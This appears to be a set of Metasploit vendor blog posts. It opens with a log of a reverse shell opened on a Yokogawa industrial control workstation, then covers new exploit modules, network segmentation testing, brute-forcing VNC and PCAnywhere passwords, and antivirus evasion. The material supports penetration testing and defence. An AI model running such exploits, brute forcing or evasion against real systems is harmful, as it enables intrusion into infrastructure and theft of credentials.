[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 427 bytes...
[*] Sending stage (770048 bytes) to 192.168.172.192
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.192:1048) at 2013-11-17 21:17:14 -0600
meterpreter > getuid
Server username: HIS0101\CENTUM
meterpreter > sysinfo
Computer : HIS0101
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Back from the UK!

 

As I mentioned last blog post, I was off last week in London, where I finally got the chance to meet an overflow of far-flung Metasploit and security luminaries, including the folks from 44Con and MWR Labs. My bucket list just got shorter. And yes, "overflow" is the correct collective noun for a gathering of security professionals and hackers.

 

Sadly, this means I managed to completely miss last week's blog post, so this week will be a two-week wrap up. We had some neat stuff land while I was away, so let's get to it.

 

OpenSSH Username Disclosure

First off, this isn't the fake OpenSSH memory disclosure bug, but instead, something real and useful, and incidentally unpatched. William Vu worked with Metasploit open source contributor kenkeiras to implement an old school timing attack on OpenSSH servers, where differences in response time for login attempts can be used to suss out what usernames are valid on a given system. While this module feels like a 90s-era info disclosure, the surprising bit is that this information leak does not appear to have a patch or any reasonable workaround.

 

As security professionals, we seem to be of two minds when it comes to username security. Passwords are obviously secret, and disclosing those is a Bad Thing, but we seem to be less sure about the confidentiality of usernames. On the one hand, they're significantly not passwords.  They're intended to be talked about, shared, and tied to particular people and services. On the other hand, determining valid usernames in the blind makes the job of a bruteforce attack about a million times easier.

 

When determining if something like this is a "real" vulnerability, it seems to mostly come down to the intent of the software. With OpenSSH, there is an implicit guarantee that usernames should not be harvestable, just like DNS zone transfers and SMTP VRFY commands shouldn't spill these weak secrets. How big of a deal is it when that guarantee is violated? It all depends on how seriously you take username security. It sure feels insecure. If you feel like this is a bigger deal, or not a deal at all, you're invited to comment below.

 

"Flash: Aaaah!"

 

hawkman.jpg

I really hope you also hear that title in Freddie Mercury's voice. If not, then I'm kind of sad for you. You're really missing out, and you probably mistook the photo at right for a scene from one of the 300 movies.


That said, we have another two modules for the seemingly endless parade of Flash bugs. Both were originally disclosed by that rascal of a security researcher, "Unknown," and implemented by our own Juan Vazquez, with some help from his shadowy network of contacts and informants in general and one Bannedit in particular.

 

Take a moment to read up on the module and the references for the Flash Integer Underflow bug and the Flash Type Confusion issue, because you're going to need that background for next week's release, I'm sure. In case you haven't noticed, this spring is starting to feel a lot like last year's Javapocolypse. Maybe it's time to give Silverlight another chance? What could go wrong?

 

The 2014 T-Shirt Cometh

As of this moment, you have another week to get your T-shirt design in for the Second Annual Metasploit T-Shirt Design Contest. Right now the 99Designs page is claiming something like two hours to go, but never mind on that -- believe me, you have a week. So, forget all those findings reports and boring IT meetings you need to prepare for, and finish off your chest-mounted masterpiece. Feel free to include some kind of weird 80s sci-fi references, since that will obviously work for me.

 

New Modules

For the last two weeks, we've got ten new modules for your exploitation pleasure, including those discussed above. The Wireshark vulnerability is especially close to my heart, since approximately 99% of all people who are likely to get owned by an exploit in Wireshark are terribly, terribly interesting targets: security analysts, network engineers, and the like. These are people who tend to have cached credentials to lots of infrastructure.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes (also last week's).

In the section about Point-of-Sale Intrusions, the Verizon 2014 Data Breach Investigations Report recommends that you "Debunk the flat network theory" to protect POS devices. Here's what it says on page 19:

 

Debunk the flat network theory

Review the interconnectivity between stores and central locations and treat them as semi-trusted connections. Segment the POS environment from the corporate network

 

This struck me as a little odd since network segmentation is a well-known and common best practice on most networks. Also, there is a strong economic incentive for companies to segment their main corporate network from anything touching credit cards: If you segment off the parts of your network that contain credit card data, your PCI scope is limited to the segments that have credit cards. In other words, you will only have to implement PCI requirements and demonstrate compliance for part of your network, not your entire network. This can mean a huge reduction in compliance costs. Since businesses mostly follow the money, it seems hard to believe that network segmentation is not prevalent with today's retailers.

 

I believe that the culprit is more likely to be a bad process for change control. As networks evolve, they change organically. Even if your network segmentation was architected and executed perfectly on day one, it will have undergone several changes. I've often heard of data breaches where a firewall configuration was changed to test something and not changed back when the test was completed.

 

One way to solve this is to implement better change control processes, but this is hard to enforce, especially in smaller organizations where process is a much heavier burden on the organization. Even in larger organizations, people could make "quick changes" outside of the process. Therefore, it is a good idea to audit whether network segmentation is operational and effective. In fact, the new PCI 3.0 standard requires that you do this if you're using network segmentation to reduce your PCI scope.

 

Rapid7 Metasploit Pro can test network segmentation by sending packets between two segments, namely between Metasploit itself and a testing server. The MetaModule tests all ports between the two machines to determine which ports are open and closed. This enables you to compare "what is" to "what should be" and determine compliance with your internal security policy and ultimately with the PCI standard.

 

Segmentation Testing.png

 

If you would like to test out Metasploit Pro's Firewall and Network Segmentation Testing MetaModule, you can get a free Metasploit Pro trial from Rapid7.com.

One of my key take-aways in the Verizon Data Breach Incident Report was that credentials are a major attack vector in 2013. Especially within the POS Intrusions, brute forcing and use of stolen creds was a major problem.

 

verizon_fig22_bruteforcing.png

 

These techniques were primarily leveraged against two targets: Shared passwords on 3rd-party provided POS systems were the biggest problem, followed directly by weak passwords on remote access solutions that enable the help desk to quickly provide help to employees working on the POS devices.

 

verizon_fig23_desktopsharing.png

When I talk to security professionals, they often tell me that they leverage L0phtcrack for brute forcing. While it's a great tool, it's really specialized in offline cracking of password hashes. For offline cracking, you need to have access to a hash that is stored in a system, typically a Windows or Unix user password.

 

However, especially in the case of remote access solutions, this approach does not work - you need to test passwords directly against the live service. Metasploit includes auxiliary modules that help you brute force passwords against PC Anywhere and VNC services. Here's how you'd conduct an audit for these services on your network with Metasploit Express or Metasploit Pro:

 

  1. Run a discovery scan on your network, which will identify any VNC or PCAnywhere services listening on the network
  2. Hit the "Bruteforce" button
  3. Select only the services for PCAnywhere and VNC, and start the brute forcing process

 

Bruteforce_vnc_pcanywhere.png

 

Metasploit Pro will now test these services using a list of the most common passwords, which include host names from the discovery scan. You can also provide your own password list, which may include the name of the POS vendors you work with.

 

By the way, Metasploit Pro also comes with a John The Ripper integration that cracks looted password hashes, covering the offline angle as well.

 

If you don't currently use Metasploit Pro, you can download a free Metasploit Pro trial on Rapid7.com. If you're running Kali Linux, Metasploit comes preinstalled. Just fill in the trial form to get the key, enter "msfconsole" on a Kali terminal, type "go_pro" and enter the license key.

When we talk about anti-virus evasion, we mostly do so in the context of a penetration test: If the "bad guys" can evade AV solutions because they write custom payloads, then a penetration tester must do the same to simulate an attack. However, AV evasion is also critical to vulnerability validation. While a full-scale penetration test looks for any way into the network, vulnerability validation surgically examines one vulnerability on a specific host and tests if it is exploitable. Security professionals do vulnerability validation because it enables them to determine if a vulnerability is "real" so they can prioritize it; many also use the validation to demonstrate the security exposure to their peers in IT operations to get quick buy-in to patch or mitigate the risk. Metasploit Pro integrates with Rapid7 Nexpose Enterprise to pull reported vulnerabilities for validation and push both validated vulnerabilities and vulnerability exceptions back into Nexpose for reporting and future testing, a process we call "closed-loop" vulnerability management.

 

metasploit-vulnerability-validation-findings.png

 

When you validate a vulnerability, you use the exploit associated to the vulnerability to test if it can be used on the machine. The idea is not only to rule out false positives but also to test if mitigating controls can stop an attack. For example, you may have closed a port on the host, shut down a service, or made adjustments on your firewall to protect the system from an attack. While anti-virus solutions are also considered security controls, they are mostly effective against mass malware attacks, not targeted attacks by a skilled attacker. When validating a vulnerability, you should therefore use anti-virus evasion that mimics these types of attackers to get a realistic picture on whether a certain vulnerability leaves a system open to attacks. If you don't, you may create an exception and accept the risk as mitigated while you're actually still vulnerable to an attack, giving you a false sense of security that could result in a breach.

 

In the recent 4.9 release of Metasploit Pro, we have improved our anti-virus evasion and baked it into all processes that use payloads, including vulnerability validation. That means that simply by leveraging Metasploit Pro for vulnerability validation, you're already using anti-virus evasion to mimic a real-world attacker. AV evasion is not included in Metasploit Framework, Community or Express, so we recommend that you use Metasploit Pro for vulnerability validations to get clean, realistic results. In fact, the classic Metasploit Framework payloads get flagged by most AV companies because they are readily available as open source, leading to false negatives in your vulnerability validation program.

 

If you don't have a copy of Metasploit Pro but would like to give it a go, simply sign up for the free Metasploit Pro trial from rapid7.com.
